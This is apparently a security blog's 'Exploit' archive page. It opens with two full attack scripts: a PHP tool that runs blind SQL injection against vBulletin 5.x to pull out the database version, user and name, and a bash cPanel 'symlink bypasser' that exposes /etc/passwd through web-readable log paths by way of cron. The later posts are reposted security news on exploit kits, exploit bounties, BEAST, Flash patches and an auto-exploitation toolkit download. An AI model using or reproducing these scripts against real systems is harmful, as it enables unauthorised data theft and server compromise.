[+] Wayc0de's Blog[+]

Tampilkan postingan dengan label Exploit. Tampilkan semua postingan
Tampilkan postingan dengan label Exploit. Tampilkan semua postingan

19/09/14

vBulletin 5.x Remote Code Execution Exploit

<?php

/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
    $ch = curl_init($url);


    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
   
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));


    $output = curl_exec($ch);
   
    if($output == FALSE) print htmlspecialchars(curl_error($ch));


    curl_close($ch);
    return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
    $string = " ".$string;
    $ini = strpos($string,$start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string,$end,$ini) - $ini;
    return substr($string,$ini,$len);
}


// Get version


print "\r\nvBulletin 5.x Remote Code Execution Exploit\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
   
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabase: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n"


?>

Sumber  Read More...

CPanel Symlink Bypasser

#!/bin/bash
# ______ __ ____ ___
# / ____/___ ____ _____ ___ / / / __ )__ ______ ____ ______________ _____ _ _< /
# / / / __ \/ __ `/ __ \/ _ \/ / / __ / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ | | / / /
# / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / /
# \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/
# /_/ /____/_/
############################################
# CPanel Symlink Bypasser [Public Version] #
# By Hannibal Ksa (@r00t3rz) & R3m0t3 Nu11 #
# alm3refh.com © Group XP 2014 #
############################################
#
# USAGE:
# 1. UPLOAD ME IN /home/user as Cpbypass.sh
# 2. GO TO CRON JOB
# 3. ADD THIS COMMAND:
# echo "Alm3refh bypass" ~| bash Cpbypass.sh -s "Alm3refh bypass" -- email@gmail.com
#
# email@gmail.com = your email
#
#
# THE FILE WILL SHOW YOU HOW TO SEE/DOWNLOAD YOUR SYMLINK!
# PS: ENJOY!
#
#
##########
# FILE #
##########
SYM="/etc/passwd"
########
echo ""
echo " ______ __ ____ ___"
echo " / ____/___ ____ _____ ___ / / / __ \)__ ______ ____ ______________ _____ _ _< /"
echo " / / / __ \/ __ \`/ __ \/ _ \/ / / __ / / / / __ \/ __ \`/ ___/ ___/ _ \/ ___/ | | / / / "
echo " / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / / "
echo " \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/ "
echo " /_/ /____/_/ "
echo " CPanel Symlink Bypasser [Public Version]"
echo " By Hannibal Ksa & R3m0t3 Nu11"
echo ""
echo ""
########
rand=bypass$(( $RANDOM % 10 + 100 ));
###
# 1st 3xpl017
###
ln -sf $SYM tmp/analog/$rand.html
echo ""
echo "1st Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/analog/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 2nd 3xpl017
###
ln -sf $SYM tmp/webalizer/$rand.html
echo ""
echo "2nd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizer/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 3rd 3xpl017
###
ln -sf $SYM tmp/webalizerftp/$rand.html
echo ""
echo "3rd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizerftp/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 4th 3xpl017
###
ln -sf $SYM logs/$rand.doc
echo ""
echo "4th Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/frontend/x3/raw/index.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo ""
echo "THEN SCROLL DOWN 'TIL YOU SEE bypass.doc AND DOWNLOAD IT!"
echo ""
# DONE of the public version!
# E0F
Read More...

10/11/11

Apple Bans Security Researcher Charlie Miller For Exposing iOS Exploit

The latest wave in the infosec world is that Apple has banned the well known security researcher – Charlie Miller – from it’s developer program for exposing a new iOS exploit.

It’s not really the smartest move as I’m pretty sure anyone as smart as Charlie Miller still has plenty of options – use another person’s account, sign up another account with a different identity, hack the phone without the developer program access and so on..

Really it’s quite a harsh move from Apple and it’s not going to make them any friends in the security industry.

Apple has banned well-known security researcher Charlie Miller from its developer program, for creating an apparently benign iOS app that was actually designed to exploit a security flaw he had uncovered in the firmware.

Within hours of talking about the exploit with Forbes’ security reporter Andy Greenberg, who published the details, Miller received an email from Apple: “This letter serves as notice of termination of the iOS Developer Program License Agreement … between you and Apple. Effective immediately.”

Based on Greenberg’s follow-up story, Apple was clearly within its rights to do so. Miller created a proof-of-concept application to demonstrate the security flaw and how it could be exploited by malicious code. He then hid it inside an apparently legitimate stock ticker program, an action that, according to Apple, “violated the developer agreement that forbid[s] him to ‘hide, misrepresent or obscure’ any part of his app,” Greenberg wrote.

He quoted Miller, who works for security consultancy Acuvant, “I’m mad. I report bugs to them all the time. Being part of the developer program helps me do that. They’re hurting themselves, and making my life harder.”

In a way though, you have to agree that Miller did violate the very specific developer program agreement by hiding the PoC inside a legitimate application. That probably wasn’t his smartest idea, but then again it’s helping Apple and he’s not doing it in a malicious way to infect people – he’s doing it as a security researcher.

Apple should be more proactive on working with people like this, people who are actually fixing bugs in their products for free and improving the user experience.

It’s the way Apple operates though, secretive, exclusive, domineering etc. If you don’t do things their way, screw you.


Miller, a former National Security Agency staffer, is a well-known “white hat” hacker (he made Network World’s recent list of “Security All Stars”), with expertise in Apple’s Mac OS X and iOS platforms, including the Safari browser, and in Android. Miller “has found and reported dozens of bugs to Apple in the last few years,” Greenberg noted. Miller reported the latest one barely three weeks ago, and it was Greenberg’s public account of it yesterday, in advance of a planned public presentation by Miller next week, that got the researcher kicked out of the developer program.

The vulnerability is a fascinating exercise in information security sleuthing. Miller uncovered a flaw introduced in Apple’s restrictions on code signing on iOS devices. Code signing is a process by which only Apple-approved commands run in device memory, according to Greenberg’s account.

Miller began to suspect a flaw when Apple released iOS 4.3 in March. He realized that to boost the speed of the mobile Safari browser, Apple for the first time had allowed javascript code from a website to run at a deeper level in memory. This entailed creating a security exception, allowing the browser to run unapproved code. According to Greenberg’s story, Apple created other security restrictions to block untrusted websites from exploiting this exception, so that only the browser could make use of it.

Miller wasn’t the only one to notice that Apple had done something different with Safari in iOS 4.3, but many didn’t understand what was actually happening. Various news sites and bloggers claimed that Web apps running outside of Safari, and its new Nitro javascript engine, were slower. Some suggested that Apple was deliberately slowing them down to make Web apps less attractive than native ones.

The way in which Miller uncovered the flaw once again shows his technical brilliance – something which Apple really should be harnessing rather than turning away.

A lot of people noticed changes with iOS 4.3, but couldn’t actually figure out what was going on. Well that’s what we know in the public realm anyway, no doubt the bad guys had their eyes on it and were digging in with much more malicious exploits.

It basically seems like a way to bypass any kind of code validation by Apple and execute arbitrary code from an attack server – dangerous indeed.
Read More...

21/10/11

Metasploit 4.1 And Armitage: What's New? [video]

 

Description: This video shows some of the new features in Armitage for Metasploit 4.1. You'll see improved tab management features, more exploit feedback, VNC, brute forcing, token stealing, and an export data feature to aid reporting. You can learn more about Armitage at rel="nofollow">http://www.fastandeasyhacking.com/
Read More...

19/10/11

winAUTOPWN v2.8 Released For Download – Windows Auto-Hacking Toolkit

I wanted to post this a while back, but the site (and thus the download) was down again – it seems to be a common occurrence. Someone get this guy some proper hosting!

winAUTOPWN and bsdAUTOPWN are minimal Interactive Frameworks which act as a frontend for quick systems vulnerability exploitation. It takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi-threaded portscan for TCP ports 1 to 65535. Exploits capable of giving Remote Shells, which are released publicly over the Internet by active contributors and exploit writers are constantly added to winAUTOPWN/bsdAUTOPWN. A lot of these exploits are written in scripting languages like python, perl and php. Presence of these language interpreters is essential for successful exploitations using winAUTOPWN/bsdAUTOPWN.

Exploits written in languages like C, Delphi, ASM which can be compiled are pre-compiled and added along-with others. On successful exploitation winAUTOPWN/bsdAUTOPWN gives a remote shell and waits for the attacker to use the shell before trying other exploits. This way the attacker can count and check the number of exploits which actually worked on a Target System.

This version covers almost all remote exploits up-till September 2011 and a few older ones as well. Also added in this release are a few ruby exploits which require ‘socket’ alone for interpretation. Gee-Hence, winAUTOPWN now requires ruby installed as well, just like perl, python and php.


This version incorporates a new command-line parameters: -targetOS to allow selection of the target Operating System. This is essential for a few exploits to work perfectly. The List of OS and the corresponding OS codes are available and asked when winAUTOPWN OR bsdAUTOPWN is executed.

Untill the last release there was only a bind_shell TCP shellcode available in the exploits. This release brings yet another feature which gives the freedom to choose from a variety of shellcodes. You can now select reverse_tcp for Windows cmd and other shellcodes for Solaris, Linux, FreeBSD, etc. This is all done by mod_shellcode which has been created and added to WINDOWS AUTOPWN and BSD AUTOPWN as well. mod_shellcode gets automatically invoked by WINDOWS AUTOPWN for every scripted exploit code whose shellcode can be manually changed. Note that there are a few exploits in a compiled binary form which lack reverse shell and other shellcode features.

mod_shellcode is available as a separate binary in the exploits/ directory for Windows, FreeBSD x86, FreeBSD x64 and DragonFly BSD platforms (just like the main BSD AUTOPWN and other exploit binaries) and hence can also be manually used by exploit writers and exploiters to quickly change shellcodes in their exploit files.

You can download winAUTOPWn v2.8 here:

winAUTOPWN_2.8.7z

And well because the site is always down, I’ve uploaded a mirror copy here:

winAUTOPWN_2.8.7z (FileSonic)

Or read more here.
Read More...

14/10/11

A Refresher on Spam and Exploits

Lately, we have been seeing a renewed increase in volume of spam attacks that utilizes an exploit kit – specifically, the BlackHole exploit kit – to trigger a malicious payload. Specifically, we have seen this in the latest slew of Automated Clearing House (ACH) spam, and the more recent spam run related to Steve Jobs’ death.

In this post, we will reorient readers on the infection chain of such attacks to help us understand why the basic mitigation practices are still effective and helpful in protecting one’s self from today’s threats.

In a typical spam campaign that involves malware, cybercriminals lure users through social engineering into performing several actions before the intended payload gets executed. For example, a user needs to download, extract, and execute a supposedly “benign” file for a spam attack to succeed.

Spam campaigns using exploit kits, however, are a bit more dangerous since they only need to lure the user into clicking a malicious link and the rest of the infection will be able to take place.


Below is an example of this type of spam purporting to be coming from National Automated Clearing House Association (NACHA). NACHA manages the ACH network, which facilitates bulk payment transactions involving businesses, governments, as well as consumers. Users who are more likely to receive email from NACHA are those who conduct transactions related to payroll, government benefits, tax refunds, and others.

Click for larger view

In the spam screenshot above, we can see that the link points to a dubious-looking domain that is not related to National Automated Clearing House Association (NACHA). A blank page is displayed when users click the link. This blank page is actually a gateway page that contains the following obfuscated JavaScript:

Click for larger view

When decrypted, we can see that it is a script that attempts to embed an iframe pointing to another malicious site, which uses the BlackHole Exploit Kit:

Click for larger view

Once the iframe is loaded, content is also loaded from the BlackHole Exploit Kit site which, again, contains a highly obfuscated script. Upon decoding the code, we can now see the actual code which searches for vulnerable software and uses the appropriate exploits.

The BlackHole Exploit Kit exploits vulnerabilities both in third-party applications like Adobe Acrobat, Adobe Flash, and Java, as well as in Windows components like Microsoft Data Access Components (MDAC) and Help and Support Center (HCP).

Click for larger view

Successful exploitation executes a shellcode, which triggers downloading and executing malware. We have observed that these attacks have been used to spread ZeuS variants, although these may also be used to spread other malware families.

Multilayer Mitigation
As a reminder to users, here are some ways to prevent this kind of threat from getting into their systems:
  • Be aware of social engineering attacks. A majority of online attacks today utilize social engineering before they can exhibit technical infection. By being wary of what you do online, infections can already be mitigated at the onset. Simple common sense like not entertaining unsolicited emails could go a long way in terms of your personal online security.
  • Always check for malicious links. Always check where the URLs hyperlinks point to. It is also a good practice to copy and paste a URL to your browser address bar instead of clicking links directly. 
  • Consider disabling JavaScript in your browser. As mentioned earlier, the gateway page and the BlackHole Exploit Kit page both used JavaScript. This is also the case for a lot of threats today that use the browser to execute a malicious payload. As such, it is a good idea to consider disabling JavaScript in your browser and only allow it to your trusted sites if necessary. 

  • Always remember to patch. The BlackHole Exploit Kit utilizes exploits that affect old, unpatched versions of software. The persistence of such tools means that old exploits are still able to infect many users. No matter how inconvenient it may be, patching your software regularly is still an important mitigation process.
The state of the threat landscape and the overwhelming reliance of the general public on the Internet demands that users should have awareness of the kinds of threats found on the Web, as well as ways to protect themselves through it. In having knowledge of how attacks such as this one work, users can gain advantage of the attackers, and be able to stop a threat even before it gets into their system. A little self-education can ultimately make the whole Internet a better and safer place to be. Read More...

06/10/11

NSS Labs offers reward money for fresh exploits

The company has set aside $4,400 for rewards for working exploits for 12 vulnerabilities

NSS Labs is sweetening the pot for its ExploitHub marketplace by offering rewards to security gurus who can write working exploits for a dozen "high-value" vulnerabilities.

The company, which has set aside $4,400 in reward money, plans to give $100 to $500 to the first people to submit a working exploit for the vulnerabilities. Ten of the vulnerabilities concern Microsoft's Internet Explorer browser, and two were found in Adobe's Flash multimedia program.

[ The Web browser is your portal to the world -- as well as the conduit that lets in many security threats. InfoWorld's expert contributors show you how to secure your Web browsers in this "Web Browser Security Deep Dive" PDF guide. ]

The exploits must be client-side remote exploits that can result in code execution. Proof-of-concept code and denial-of-service conditions do not qualify. NSS Labs will pay the developer with American Express gift cards. Residents from countries that the U.S. has a standing embargo against are not allowed to participate.

NSS Labs said that those who win can then sell their exploits on ExploitHub, a marketplace the company set up for penetration testers to acquire exploits to test against their infrastructure. ExploitHub was set up to help with the development of penetration testing tools and to assist computer security researchers.

Those who write the winning exploits may then sell their code on ExploitHub, with NSS Labs taking a 30 percent commission. Penetration testers can also make requests via the marketplace for exploits for specific vulnerabilities. Those who want to buy exploits are vetted by NSS Labs to ensure the marketplace is not abused.

ExploitHub also only sells exploits for vulnerabilities that have been patched and does not host ones for zero-day vulnerabilities. The vulnerabilities that NSS Labs is offering the reward for are:
  1. CVE-2011-1256: Microsoft Internet Explorer CElement Memory Corruption
  2. CVE-2011-1266: Microsoft Internet Explorer VML vgx.dll Use After Free
  3. CVE-2011-1261: Microsoft Internet Explorer selection.empty Use After Free
  4. CVE-2011-1262: Microsoft Internet Explorer Redirect Memory Corruption
  5. CVE-2011-1963: Microsoft Internet Explorer XSLT Memory Corruption
  6. CVE-2011-1964: Microsoft Internet Explorer Style Object Memory Corruption
  7. CVE-2011-0094: Microsoft Internet Explorer CSS Use After Free Memory Corruption
  8. CVE-2011-0038: Microsoft Internet Explorer 8 IESHIMS.DLL Insecure Library Loading
  9. CVE-2011-0035: Microsoft Internet Explorer Deleted Data Source Object Memory Corruption
  10. CVE-2010-3346: Microsoft Internet Explorer HTML Time Element Memory Corruption
  11. CVE-2011-2110: Adobe Flash Player ActionScript Function Variable Arguments Information
  12. CVE-2011-0628: Adobe Flash Player Remote Integer Overflow Code Execution
Read More...

ExploitHub Offering Bounties - And Residuals - for Exploits

NSS Labs’ announced today that their penetration-testing site, Exploithub, will be offering bounties to researchers for developing exploits for12 high-value vulnerabilities.

Exploithub is putting up $4,400 for working exploits against what the company describes as a “dirty dozen” of client-side vulnerabilities. And, in what may be a first in the vulnerability research field, the company is offering the authors the chance to earn residual payments for subsequent use of the vulnerabilities.

Launched in October of 2010, Exploithub is described as an "iTunes for exploits" - an easy to use market for penetration testers and IT staff to obtain high quality exploits to use against software they are evaluating.

But every iTunes needs its music, so NSS has opted to put money on the table to attract talented vulnerability researchers and prime the pump. NSS has identified 12 known vulnerabilities by their Common Vulnerabitiles and Exposures (CVE) numbers. They are: CVE-2011-1256, CVE-2011-1266, CVE-2011-1261, CVE-2011-1262, CVE-2011-1963, CVE-2011-1964, CVE-2011-0094, CVE-2011-0038, CVE-2011-0035, CVE-2010-3346, CVE-2011-2110, and CVE-2011-0628. Each exploit will be worth somewhere between $100 and $500. Ten of the eligible vulnerabilities are in Microsoft's Internet Explorer browser, with the remaining two being in Adobe Flash.

Submitted bounty candidates must be client-side remote exploits resulting in code execution, PoC and denial of service does not count, and the exploits under the bounty program cannot currently be available in the Metasploit framework community or other exploit toolkits. The first participant to submit a working exploit wins.

“Client-side exploits are the weapons of choice for modern attacks, including spear phishing and so-called APTs. Security professionals need to catch up,” said Rick Moy, NSS Labs CEO in a statement. “This program is designed to accelerate the development of testing tools, as well as help researchers do well by doing good.” Read More...

05/10/11

Facebook Malvertisement Leads to Exploits

There are already many known ways by which cybercriminals target Facebook users. In the infographic we recently released, “The Geography of Social Media Threats,” we illustrated the different social networking features cybercriminals abused and the threats that these usually lead to.

In the course of conducting research, we found one specific attack that targeted Facebook users through a different route—malvertisements.

We encountered an infection chain wherein the user is led from a page within Facebook to a couple of ad sites then, finally, to a page that hosts exploits. When we traced the connection between the ad sites and Facebook, we found that the ad providers were affiliated with a certain Facebook application. We checked out the said application and found that it is indeed ad supported. We were able to come up with the likely infection chain based on this finding:


Upon accessing the application, the malvertisement gets loaded, triggering a series of redirections. The redirections finally lead to a malicious site, which then loads several exploits, particularly those related to Java and ActiveX:
The exploits were loaded to download more malicious files although we weren’t able to trace these anymore since the URLs they accessed were already inaccessible. Nonetheless, Trend Micro already provides protection for this kind of threat by not only blocking access to malicious URLs but also by protecting against the execution of the said exploits.

Malvertisements are considered grave threats, especially since much like website compromises, attacks related to these usually involve trusted sites that users already typically visit without risk of system infection. In 2009, visitors of the NYTimes were exposed to threats when malvertisements were found on its pages, leading users to FAKEAV variants. Earlier this year, Trend Micro researchers also found malicious ads being displayed in a Web-based email service, directing users to URLs serving PDF exploits.

For this particular incident, users are advised to be careful when it comes to installing Facebook applications and, more importantly, to utilize a security product with a strong Web reputation technology that can help determine bad links from good ones within a social networking environment. Read More...

23/09/11

Has CERN found an exploitable vulnerability in physics?

We don't often cover non-computer non-security news on Naked Security.

(Don't worry. When we do, we take great care to find some sort of connection - however nebulous - to the cyberworld, just to keep you, our readers, onside, and to ensure that the URIs in your web logs look as relevant and as important as ever.)

But some news just cries out to be told, like this: that researchers at the European Organization for Nuclear Research, better known as CERN, claim to have exported subatomic particles from Switzerland to Italy at greater than the speed of light!

You read that correctly. Greater than the speed of light - something which even science fiction fans accept isn't really supposed to happen.

Reports say that CERN boosted streams of neutrinos to a whopping 300,006 kilometres per second on their journey from Geneva, Switzerland, to a laboratory over 700km away in Gran Sasso, Italy.



But received wisdom - and the so-called Standard Model of physics - says that the neutrinos ought to have topped out at just 299792 kilometres per second, the speed of light. Suddenly, the laws of physics seem to have an exploitable vulnerability.

The results now need checking out, a project which researchers worldwide will doubtless be keen to take on.

Unless and until the findings are disproved, however, we can all hope that this means that the speed of light will no longer be the limiting factor in the speeds at which we can send data across the internet.

And then, who knows?

Perhaps we will be able to replace our fibre optic cables with neutrino-based transmission systems, and gain an unexpected 0.07% improvement in performance?

Just imagine how much more YouTube video we'd be able to pack into our busy lives!

nb : nakedsecurity.sophos
Read More...

Secure Boot in Windows 8 Worries Researchers

Windows 8Windows 8, like Windows 7 and Vista before it, is being touted as the most secure version of Windows ever. In past releases, many of the security improvements have come through exploit mitigations such as ASLR and DEP and better software security practices during development. In Windows 8, however, one of the major changes is the addition of UEFI, a BIOS replacement that will include a secure boot sequence to help prevent low-level malware infections. That change, however, is not sitting well with everyone.

The way that Windows 8 client machines will boot is going to be quite different from the way that current Windows PCs do. Instead of a BIOS, Windows 8 PCs will include an implementation of UEFI (Unified Extensible Firmware Interface), which is more flexible and programmable than BIOS is. UEFI will sit between the firmware and the Windows operating system and Microsoft is reportedly going to require that any client machine that runs Windows 8 have a secure boot sequence enabled by default. That sequence will require that whatever software is loaded during boot be signed by one of the keys included in the firmware. If the firmware or software isn't signed by a trusted certificate authority, Windows 8 will not load it.

The impetus for this change in the boot process is that attackers have become proficient in recent years at finding methods to load malware into the BIOS and firmware that underlie the OS. In some cases, rootkits, bootkits and malware that infects the master boot record can not be removed from the machine without re-installing the operating system. Microsoft and security vendors have been trying to find ways defeat these attacks for several years now, and the move to UEFI and secure boot is one of the results of that effort.

It's been a long journey for Microsoft to arrive at this destination. The company has been pushing various versions of a hardware-based security system for nearly a decade now. An early version, originally known as the Windows Next Generation Secure Computing Base and later Palladium, generated quite a bit of controversy when it was first discussed. Many of the elements of the Palladium system are now included as part of some laptops and the Windows 8 UEFI implementation: hardware security modules, secure boot, signing of software, encrypted storage of files. While some portions of what Microsoft has implemented in Windows 8 won't require the use of a TPM (Trusted Platform Module), others will, including support for encrypted hard drives.

These security additions to Windows 8 have some benefits, but there also are some potential drawbacks that worry security and privacy advocates. Ross Anderson of the University of Cambridge worries that there is the potential for hardware-based lock-in included with the Windows 8 changes.

"The extension of Microsoft’s OS monopoly to hardware would be a disaster, with increased lock-in, decreased consumer choice and lack of space to innovate. It is clearly unlawful and must not succeed," Anderson said in a blog post.
There also has been concern in the open-source community that the changes in Windows 8 will prevent users from loading alternate operating systems on Windows-based PCs. There may be some ways for users to circumvent the UEFI implementation and find a method for loading a separate OS, but it would likely be difficult.

"There's no indication that Microsoft will prevent vendors from providing firmware support for disabling this feature and running unsigned code. However, experience indicates that many firmware vendors and OEMs are interested in providing only the minimum of firmware functionality required for their market. It's almost certainly the case that some systems will ship with the option of disabling this. Equally, it's almost certainly the case that some systems won't. It's probably not worth panicking yet. But it is worth being concerned," wrote Matthew Garrett, a developer at Red Hat, in a blog post on the Windows 8 changes.

nb : threatpost Read More...

22/09/11

Adobe Releases Out-of-Band Patch

Adobe released an out-of-band security update to address six critical vulnerabilities, all affecting Adobe Flash Player.

One of the six, a cross-site scripting vulnerability identified as CVE-2011-2444, is reportedly being exploited in the wild. The bug is reportedly being used in targeted attacks that involve malicious links sent out to targets through email messages.

Adobe attributed the discovery of CVE-2011-2444 to Google, who, in response to finding the vulnerability, issued an update for the Google Chrome browser to prevent attackers from exploiting the security hole.

Users are strongly advised to apply the patches as soon as possible, especially since exploiting any the addressed vulnerabilities can lead to either remote code execution, or information disclosure.

Note that users who utilize multiple browsers may need to update their other browsers separately. Users can visit this page through all their browsers to check if they have the latest version of Adobe Flash Player installed, and this page to update. Here is the list of Adobe Flash Player versions affected by vulnerabilities addressed in this update:

  • Flash Player 10.3.183.7 and earlier
  • Flash Player 10.3.183.7 and earlier for network distribution
  • Flash Player 10.3.186.6 and earlier for Android
  • Flash Player 10.3.183.7 and earlier for Chrome users
We will update this post once we find more information about the exploit.

nb : trendmicro Read More...

Researchers claim to have broken SSL/TLS encryption

Researchers claim Beast beats web protection (photo:Thinkstock)Two security researchers claim to have found a way of breaking the SSL/TLS encryption that is widely used to guarantee the reliability and privacy of data exchanged between web browsers and servers.

The researchers, Thai Duong and Juliano Rizzo, are due to demonstrate their Browser Exploit Against SSL/TLS (Beast) at the Ekoparty security conference on Friday 23 September.

News of the Beast ahead of the demonstration has created a stir in the security community, according to Help Net Security.

The latest two versions (1.1 and 1.2) of the TLS cryptographic protocol are reportedly invulnerable to the exploit, but the majority of websites, VPNs and instant messaging services in operation use the vulnerable version 1.0 because of its compatibility with the widest range of other web technologies.

Beast consists of JavaScript code that works with a network sniffer to decrypt the cookies that carry user credentials to access accounts.

Unlike most published attacks against https that focus on the authenticity property of SSL, Beast attacks the confidentiality of the protocol, Duong told The Register.

Duong and Rizzo claim that Beast implements the first attack that actually decrypts https requests.

The researchers claim they have been working with browser and SSL suppliers since May, but every fix proposed so far has proved to be incompatible with some existing SSL applications.

Philip Hoyer, director of Strategy Solutions at ActivIdentity, said if the claims are true, authentication should be done as an ever-changing and one-time password, so even if the attacker sees a password, it always changes and hence cannot be guessed for the next authentication.


This can be achieved by many techniques, he said, both using one-time password (OTP) technology and public key infrastructure (PKI) using a challenge response.

"But this won't help to a level that is needed since the attacker can then simply read and hijack your session. So the only true defence from fraudulent transactions is to sign the transaction or part of the transaction data so that the attacker cannot inject bogus material," said Hoyer.

This means effectively using a token with a pin pad to enter transaction details or signing the transaction using a PKI certificate.

"This allows a cryptographic signature that the attacker can't forge and is intrinsically linked to the transaction data that is independent from the transport security and cannot be forged by the spying attacker," he said.

Hoyer believes this is the only way to stay secure until the infrastructure has been upgraded from TLS V1.0.

nb : computerweekly
Read More...

Adobe to rush out Flash Player patch to thwart zero-day attacks

Summary: Another in-the-wild zero-day attack prompts an urgent Flash Player patch from Adobe.
Adobe is planning to rush out a critical Flash Player patch later today (September 21, 2011) to fix security holes that are being used in targeted zero-day attacks.

According to Adobe, the Flash Player update will address critical security issues in the product as well as an importantuniversal cross-site scripting issue that is reportedly being exploited in the wild in targeted attacks.

The company is expected to fix at least 16 documented vulnerabilities, some critical enough to expose Windows and Mac users to code execution attacks via Flash files hosted on Web pages.

The Adobe patch comes a day after Google shipped a Chrome update that “includes an update to Flash Player that addresses a zero-day vulnerability.”
Details on the targeted zero-day attacks are not yet available but it’s clear these types of attacks are happening at a very high level.

Just this week at the United Security Summit, Adobe security chief Brad Arkin said the company’s main adversaries are state-sponsored actors.
From Threatpost’s Dennis Fisher:


“In the last eighteen months, the only zero days found in our software have been found by what Dave Aitel would call carrier-class adversaries,” Arkin said in his keynote speech at the United Security Summit here Tuesday. “These are the groups that have enough money to build an aircraft carrier. Those are our adversaries.”

Arkin said that when a new attack involving a zero-day bug in one of Adobe’s products starts, it typically will begin with attacks against a select group of high-profile organizations. That usually means defense contractors, government agencies or large financial services companies. Once the security teams at those organizations find and analyze the threat, Arkin said his team will begin getting a flurry of calls within an hour or two as the campaign hits.
From there, the attack will often then move down the ladder to other large enterprises and then smaller ones as the new exploit shows up in crimeware packs and automated attack tools. By that time, it’s likely an entirely different set of attackers using the exploit. But it’s the well-funder and highly skilled attackers who are doing the real heavy lifting in terms of finding new bugs and designing methods to exploit them.

“These samples trickle downhill really quickly and show up in crime packs,” Arkin said. “The actual exploits it turns out are very, very expensive and difficult to build. Finding the flaw is a lot easier than writing the exploit. If you want to defend against the carrier-class adversary, it’s a very different cost.”

In addition to Flash Player, Adobe’s PDF Reader and Acrobat software products are among the main targets for sophisticated attacks.

nb : zdnet
Read More...

17/09/11

Rooting Exploit for Android Works Silently

In our last blog about Android malware, we discussed the expanding threat landscape for Android malware. Recently, we received an Android package in our collection and observed that this malicious application uses a rooting exploit that targets Android devices running OS Versions 2.3 or earlier to gain root privileges on the compromised device.

